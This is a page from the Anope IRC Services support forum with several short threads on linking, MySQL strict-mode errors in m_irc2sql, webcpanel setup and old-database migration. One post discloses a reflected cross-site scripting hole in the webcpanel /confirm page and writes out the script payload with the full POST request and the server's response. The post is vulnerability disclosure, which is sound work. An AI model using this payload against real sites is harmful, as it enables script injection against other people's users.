Anope IRC Services

Please login or register.

Login with username, password and session length
Advanced search  

News:

Pages: [1] 2 3 ... 10
 1 
 on: June 22, 2017, 06:56:47 PM 
Started by Aragon - Last post by Jahner
Going to take a long shot here and see if anyone might still have this tool. Currently using IRC Services and really want to move over to Anope. Links not working in this thread and can't find anything anywhere to convert over. Fingers crossed someone out there can humor me and help out.

 2 
 on: June 21, 2017, 12:01:29 AM 
Started by Y - Last post by wakened
I had the exact same problem with Anope-2.0.5 linking to InspIRCd 2.0.24 and the only way I could get it to link is by taking out "ssl="openssl"" from the link block on the ircd's config, it linked even though I had openssl enabled in Anope.

 3 
 on: June 05, 2017, 01:14:03 PM 
Started by Nikos - Last post by Nikos
Well,i got free time to deal with webcpanel and anope features again.I think no one would want to post vulns but i love anope so i will do it.
Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before. People often think that because they see the lock on their browser it means everything is secure. So this just isn't the case.

This vulnerability affects the /confirm page which doesn't filter metacharacters from the user input.
URL encoded POST input email: url%40email.com'"()&%<ScRiPt >prompt(1)</ScRiPt>

<<<REQUEST>>> #Network is hidden
POST /confirm HTTP/1.1
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
Referer: https://anope.***.org/
Host: anope.***.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

email=url%2540email.com'%22()%26%25<ScRiPt%20>prompt(1)</ScRiPt>&password=thisIs%24%24UrL&username=nikos

<<<RESPONSE>>>
HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Mon, 05 Jun 2017 11:32:50 GMT
Content-Type: text/html
Content-Length: 1642
Connection: keep-alive
Strict-Transport-Security: max-age=15768000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none


Please verify.


 4 
 on: May 29, 2017, 01:03:21 PM 
Started by Kaj - Last post by Jens Voss
Hello Kaj,

thank you for reporting. I will look into it.

Kind regards
Jens

PS: we also have a bugtracker at https://bugs.anope.org :-)

 5 
 on: May 29, 2017, 12:51:40 PM 
Started by Kaj - Last post by Kaj
Hello,

I've noticed a problem when I tried to load the m_irc2sql module. After starting the services, everything works fine but the stats-tables (anope_chan and anope_user) stayed empty. If I started the application in debug mode I've notices a lot of errors like:

Quote
[May 29 09:10:35.933274 2017] m_irc2sql: Error executing query INSERT INTO `anope_chan` (channel, topic, topicauthor, topictime, modes) VALUES ('#Games','','','0','') ON DUPLICATE KEY UPDATE channel=VALUES(channel), topic=VALUES(topic),topicauthor=VALUES(topicauthor), topictime=VALUES(topictime), modes=VALUES(modes): Incorrect datetime value: '0' for column 'topictime' at row 1

After some research I've concluded that this was due to changes since mysql version 5.7 - where sqlmode STRICT_TRANS_TABLES was introduced and enabled by default:

Quote
From MySQL 5.7.4 through 5.7.7, STRICT_TRANS_TABLES includes the effect of the ERROR_FOR_DIVISION_BY_ZERO, NO_ZERO_DATE, and NO_ZERO_IN_DATE modes

After disabling this mode, the module works fine - so I am happy but I thought it would be nice to report it. Because it would even be better that this would ever get fixed in Anope itself rather than disabling this mode in mysql.

Kind regards,

Kaj



 6 
 on: May 26, 2017, 10:36:22 PM 
Started by mark - Last post by Adam
Load m_httpd and also m_webcpanel. You can use apache as a reverse proxy to it if you want, but the webserver which serves the webpanel is internal to Anope.

 7 
 on: May 26, 2017, 10:14:18 PM 
Started by mark - Last post by mark hunt
ive figured out so far, that I should somehow point my apache to read from the folder with the default web templates? or should I put that folder somewhere else? please help . iam using centos 7 with apache web server. thanks!

 8 
 on: May 24, 2017, 02:16:09 AM 
Started by mark - Last post by mark
thanks i just checked and saw i didnt have it loaded.

 9 
 on: May 24, 2017, 02:00:44 AM 
Started by mark - Last post by Adam
Did you load enc_none?

 10 
 on: May 24, 2017, 01:55:08 AM 
Started by mark - Last post by mark
Hi all,

 Iam finished setting up new irc services (I already had an older unrealircd and anope 1.8

Iam trying to update old databases. heres my code "i have uncommented "db_old" and put my databases into the new installation of anope data folder. and then i start the server, it does show I have a nickname, but my password is incorrect. I have even stopped it, and tried all the other file encryption "sha1, md5, oldmd5,plain, etc. and nothing works, still says my password is wrong.

module
{
   name = "db_old"

   /*
    * This is the encryption type used by the databases. This must be set correctly or
    * your passwords will not work. Valid options are: plain, oldmd5, sha1, and plain.
    * You must also be sure to load the correct encryption module below in the Encryption
    * Modules section so that your passwords work.
    */
   hash = "plain"
}


/*
 * [RECOMMENDED] db_flatfile
 *
 * This is the default flatfile database format.
 */
module
{
   name = "db_flatfile"

   /*
    * The database name db_flatfile should use
    */
   database = "anope.db"

   /*
    * Sets the number of days backups of databases are kept. If you don't give it,
    * or if you set it to 0, Services won't backup the databases.
    *
    * NOTE: Services must run 24 hours a day for this feature to work.
    *
    * This directive is optional, but recommended.
    */
   keepbackups = 3

   /*
    * Allows Services to continue file write operations (i.e. database saving)
    * even if the original file cannot be backed up. Enabling this option may
    * allow Services to continue operation under conditions where it might
    * otherwise fail, such as a nearly-full disk.
    *
    * NOTE: Enabling this option can cause irrecoverable data loss under some
    * conditions, so make CERTAIN you know what you're doing when you enable it!
    *
    * This directive is optional, and you are discouraged against enabling it.
    */
   #nobackupokay = yes

   /*
    * If enabled, services will fork a child process to save databases.
    *
    * This is only useful with very large databases, with hundreds
    * of thousands of objects, that have a noticeable delay from
    * writing databases.
    *
    * If your database is large enough cause a noticeable delay when
    * saving you should consider a more powerful alternative such
    * as db_sql or db_redis, which incrementally update their
    * databases asynchronously in real time.
    */
   fork = no
}

thanks!
mark

Pages: [1] 2 3 ... 10